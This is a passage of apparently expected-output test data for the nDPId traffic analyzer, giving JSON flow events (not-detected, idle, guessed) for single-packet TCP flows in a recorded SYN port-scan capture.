+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","ndpi": 